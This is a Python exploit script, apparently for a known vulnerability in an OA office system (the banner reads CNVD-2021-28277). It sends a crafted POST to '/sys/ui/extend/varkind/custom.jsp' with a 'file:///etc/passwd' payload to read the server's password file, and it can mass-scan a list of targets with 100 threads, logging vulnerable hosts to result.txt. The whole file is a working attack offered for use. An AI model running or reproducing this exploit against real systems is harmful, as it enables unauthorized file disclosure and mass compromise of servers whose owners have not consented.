import requests,sys,argparse
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test="""
 _____  _   _ _   _______        _____  _____  _____  __        _____  _____  _____  ____________
/  __ \| \ | | | | |  _  \      / __  \|  _  |/ __  \/  |      / __  \|  _  |/ __  \|___  /___  /
| /  \/|  \| | | | | | | |______`' / /'| |/' |`' / /'`| |______`' / /' \ V / `' / /'   / /   / / 
| |    | . ` | | | | | | |______| / /  |  /| |  / /   | |______| / /   / _ \   / /    / /   / /  
| \__/\| |\  \ \_/ / |/ /       ./ /___\ |_/ /./ /____| |_     ./ /___| |_| |./ /___./ /  ./ /   
 \____/\_| \_/\___/|___/        \_____/ \___/ \_____/\___/     \_____/\_____/\_____/\_/   \_/    
                                                                                                                                                                             
"""

    print(test)



def main():
    banner()
    parser=argparse.ArgumentParser(description='oa-前台代码执行')
    parser.add_argument('-u','--url',dest='url',type=str,help='input the url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input the file')
    args=parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")



def poc(target):
    url_payload= '/sys/ui/extend/varkind/custom.jsp'
    headers={
        'User-Agent':'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept':'*/* Connection: Keep-Alive',
        'Content-Length':'42',
        'Content-Type':'application/x-www-form-urlencoded'
    }
    data='var={"body":{"file":"file:///etc/passwd"}}'

    try:
        res1=requests.post(url=target+url_payload,headers=headers,data=data,timeout=10)
        if res1.status_code==200 and 'root' in res1.text:
            print( f"[+]{target} 存在漏洞！")
            with open('result.txt','a',encoding='utf-8')as fp:
                fp.write(target+'\n')
                return True
        else:
            print('[-] 不存在漏洞')
            return False
    except:
        print('目标网站存在问题，无法访问')



if __name__ =='__main__':
    main()
